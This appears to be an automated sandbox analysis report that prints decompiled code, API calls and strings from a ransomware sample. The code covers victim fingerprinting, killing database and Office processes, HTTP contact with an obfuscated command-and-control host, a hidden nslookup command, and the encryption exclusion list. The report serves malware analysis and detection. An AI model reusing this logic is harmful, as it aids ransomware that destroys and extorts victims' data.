					_v180 = 0x6f0069;
					_v176 = 0x2e006e;
					_v172 = 0x6f0074;
					_v168 = 0x2f0070;
					_v164 = 0;
					_t113 =  *0x412ae4; // 0x8d0000
					if(_t113 == 0) {
						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0x412ae4 = _t56;
						if(_t56 != 0) {
							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
						}
					}
					VirtualFree(_v156, 0, 0x8000);
					_t44 = E00407720( &_v152);
					goto L25;
				}
				while(1) {
					L11:
					lstrcpyW(_t84, _t90);
					_t84[lstrlenW(_t84)] = 0x20;
					_t84 = 0x412000;
					_t60 =  *0x412000; // 0xfeff
					if(_t60 == 0) {
						goto L21;
					}
					_t73 = _t60 & 0x0000ffff;
					_t92 = 0x412000 - L"{USERID}";
					do {
						_t61 = L"{USERID}";
						if(_t73 == 0) {
							goto L19;
						}
						while(1) {
							_t74 =  *_t61 & 0x0000ffff;
							if(_t74 == 0) {
								break;
							}
							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
							if(_t80 != 0) {
								L18:
								if( *_t61 == 0) {
									break;
								}
								goto L19;
							}
							_t61 =  &(_t61[1]);
							if( *(_t92 + _t61) != _t80) {
								continue;
							}
							goto L18;
						}
						_t90 = _v236;
						goto L11;
						L19:
						_t20 =  &(_t84[1]); // 0x2d002d
						_t73 =  *_t20 & 0x0000ffff;
						_t84 =  &(_t84[1]);
						_t92 = _t92 + 2;
					} while (_t73 != 0);
					_t90 = _v236;
					goto L21;
				}
				goto L21;
			}

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
lstrcpyW.KERNEL32 ref: 004041C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE

Strings

ransom_id=, xrefs: 00404134, 00404140
p, xrefs: 004042BC
d, xrefs: 0040425C
h, xrefs: 0040426C
n, xrefs: 004042AC
t, xrefs: 004042B4
h, xrefs: 0040423C
o, xrefs: 0040429C
c, xrefs: 0040428C
7, xrefs: 00404284
/, xrefs: 00404254
q, xrefs: 0040427C
j, xrefs: 00404274
i, xrefs: 004042A4
:, xrefs: 0040424C
b, xrefs: 00404264
{USERID}, xrefs: 0040419F, 004041ED, 004041F3
k, xrefs: 00404294
t, xrefs: 00404244
%s%s, xrefs: 004042F3

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
API String ID: 4100118565-914392996
Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E

Uniqueness

Uniqueness Score: -1.00%

Function 00404640 Relevance: 47.4, APIs: 10, Strings: 17, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00404640() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}

0x00404646
0x00404653
0x0040465b
0x00404663
0x0040466b
0x00404673
0x0040467b
0x00404683
0x0040468b
0x00404693
0x0040469b
0x004046a3
0x004046ab
0x004046b3
0x004046bb
0x004046c3
0x004046cb
0x004046d3
0x004046db
0x004046e3
0x004046eb
0x004046f3
0x004046fb
0x00404703
0x0040470b
0x00404713
0x0040471b
0x00404723
0x0040472e
0x00404739
0x00404744
0x0040474f
0x0040475a
0x00404765
0x00404770
0x0040477b
0x00404786
0x00404791
0x0040479c
0x004047a7
0x004047c4
0x004047c8
0x004047d2
0x004047d6
0x004047d8
0x004047e1
0x004047e3
0x004047e5
0x004047e5
0x004047e1
0x004047f1
0x004047f1
0x004047f4
0x004047f4
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404853
0x00404859
0x00404863
0x00404863
0x00404872

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
CloseHandle.KERNEL32(?), ref: 0040486A

Strings

@, xrefs: 0040465B
(@, xrefs: 0040479C
X@, xrefs: 004046E3
@, xrefs: 004046CB
L@, xrefs: 0040472E
x@, xrefs: 00404673
@@, xrefs: 004047A7
P@, xrefs: 004046AB
l@, xrefs: 004046EB
0@, xrefs: 00404723
l@, xrefs: 004046B3
x@, xrefs: 00404744
8@, xrefs: 004046DB
`@, xrefs: 00404739
\@, xrefs: 00404765
\@, xrefs: 0040466B
<@, xrefs: 00404663

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
API String ID: 3586910739-3725814736
Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00407A00 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 132
networkfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v8;
				void* _v12;
				void* _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				void* _t38;
				void* _t40;
				long _t55;
				long _t60;
				WCHAR* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E004077F0(_t65);
				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t66 = _t40;
				_v8 = 0;
				_v12 = _t66;
				if(_t66 != 0) {
					_t63 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v16 = _t63;
					wsprintfW(_t63, L"%s", _a8);
					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t64 != 0) {
						_v64 = 0x6f0048;
						_v20 = 0;
						_v60 = 0x740073;
						_v56 = 0x20003a;
						_v52 = 0x6f006e;
						_v48 = 0x6f006d;
						_v44 = 0x650072;
						_v40 = 0x610072;
						_v36 = 0x73006e;
						_v32 = 0x6d006f;
						_v28 = 0x62002e;
						_v24 = 0x740069;
						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t68 = _a20;
								_t60 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
									while(1) {
										_t55 = _a4;
										if(_t55 == 0) {
											goto L13;
										}
										 *((char*)(_t55 + _t68)) = 0;
										_a4 = 0;
										_v8 = 1;
										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t64);
					InternetCloseHandle(_v12);
					VirtualFree(_v16, 0, 0x8000);
					return _v8;
				} else {
					return _t40;
				}
			}

0x00407a08
0x00407a0b
0x00407a10
0x00407a13
0x00407a13
0x00407a1b
0x00407a32
0x00407a38
0x00407a3a
0x00407a41
0x00407a46
0x00407a68
0x00407a70
0x00407a73
0x00407a97
0x00407a9b
0x00407aa3
0x00407aab
0x00407ab6
0x00407abd
0x00407ac4
0x00407acb
0x00407ad2
0x00407ad9
0x00407ae0
0x00407ae7
0x00407aee
0x00407af5
0x00407b04
0x00407b1b
0x00407b6c
0x00407b1d
0x00407b23
0x00407b26
0x00407b2b
0x00407b3a
0x00407b40
0x00407b40
0x00407b45
0x00000000
0x00000000
0x00407b47
0x00407b52
0x00407b59
0x00407b68
0x00000000
0x00000000
0x00407b6a
0x00000000
0x00407b68
0x00407b40
0x00407b3a
0x00407b1b
0x00407b04
0x00407b72
0x00407b79
0x00407b7e
0x00407b8a
0x00407b99
0x00407a4e
0x00407a4e
0x00407a4e

APIs

InternetCloseHandle.WININET(?), ref: 00407A13
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
wsprintfW.USER32 ref: 00407A73
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
GetLastError.KERNEL32 ref: 00407B6C
InternetCloseHandle.WININET(00000000), ref: 00407B79
InternetCloseHandle.WININET(00000000), ref: 00407B7E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A

Strings

., xrefs: 00407AEE
r, xrefs: 00407AD9
m, xrefs: 00407ACB
:, xrefs: 00407ABD
n, xrefs: 00407AE0
r, xrefs: 00407AD2
HTTP/1.1, xrefs: 00407A87
n, xrefs: 00407AC4
Fi@, xrefs: 00407B1D
s, xrefs: 00407AB6
H, xrefs: 00407AA3
i, xrefs: 00407AF5
o, xrefs: 00407AE7

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
API String ID: 3906118045-996335725
Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404D60 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 101
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D60(CHAR* __ecx, void* __edx) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				short _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t37;
				CHAR* _t43;
				void* _t45;

				_v76 = 0x73006e;
				_v20 = 0;
				_t37 = __edx;
				_v16.lpSecurityDescriptor = 0;
				_t43 = __ecx;
				_v72 = 0x6f006c;
				_v68 = 0x6b006f;
				_v64 = 0x700075;
				_v60 = 0x250020;
				_v56 = 0x200053;
				_v52 = 0x6e0064;
				_v48 = 0x310073;
				_v44 = 0x73002e;
				_v40 = 0x70006f;
				_v36 = 0x6f0072;
				_v32 = 0x6e0064;
				_v28 = 0x2e0073;
				_v24 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0);
				if(_t24 != 0) {
					_t24 = SetHandleInformation( *0x412b10, 1, 0);
					if(_t24 == 0) {
						goto L1;
					} else {
						CreatePipe(0x412b08, 0x412b14,  &_v16, 0);
						_t24 = SetHandleInformation( *0x412b14, 1, 0);
						if(_t24 == 0) {
							goto L1;
						} else {
							_t45 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t45 == 0) {
								lstrcpyA(_t43, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t45,  &_v76, _t37);
								E00404B10(_t45);
								E00404CB0(_t37, _t43, _t37, _t43, _t45);
								VirtualFree(_t45, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t24 | 0xffffffff;
				}
			}

0x00404d6b
0x00404d73
0x00404d77
0x00404d79
0x00404d7c
0x00404d81
0x00404d93
0x00404d9a
0x00404da1
0x00404da8
0x00404daf
0x00404db6
0x00404dbd
0x00404dc4
0x00404dcb
0x00404dd2
0x00404dd9
0x00404de0
0x00404de7
0x00404dee
0x00404df5
0x00404dfd
0x00404e19
0x00404e1d
0x00000000
0x00404e1f
0x00404e2f
0x00404e3f
0x00404e43
0x00000000
0x00404e45
0x00404e59
0x00404e5d
0x00404e9b
0x00404ea9
0x00404e5f
0x00404e65
0x00404e70
0x00404e79
0x00404e86
0x00404e94
0x00404e94
0x00404e5d
0x00404e43
0x00404dff
0x00404dff
0x00404e08
0x00404e08

APIs

CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
wsprintfW.USER32 ref: 00404E65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404E86

Strings

n, xrefs: 00404D6B
o, xrefs: 00404D93
u, xrefs: 00404D9A
l, xrefs: 00404D81
, xrefs: 00404DA1
d, xrefs: 00404DD2
r, xrefs: 00404DE0
., xrefs: 00404DBD
s, xrefs: 00404DD9
S, xrefs: 00404DA8
s, xrefs: 00404DB6
r, xrefs: 00404DCB
o, xrefs: 00404DC4
d, xrefs: 00404DAF
fabian wosar <3, xrefs: 00404E95

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
API String ID: 1490407255-783179298
Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406240 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406240(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
lstrlenW.KERNEL32(00000000), ref: 00406251
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6

Strings

ntuser.dat, xrefs: 00406298
ntuser.dat.log, xrefs: 004062C8
GDCB-DECRYPT.txt, xrefs: 004062E0
thumbs.db, xrefs: 004062D4
bootsect.bak, xrefs: 004062B0
autorun.inf, xrefs: 0040628C
iconcache.db, xrefs: 004062A4
boot.ini, xrefs: 004062BC
desktop.ini, xrefs: 00406277

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-634406045
Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD

Uniqueness

Uniqueness Score: -1.00%

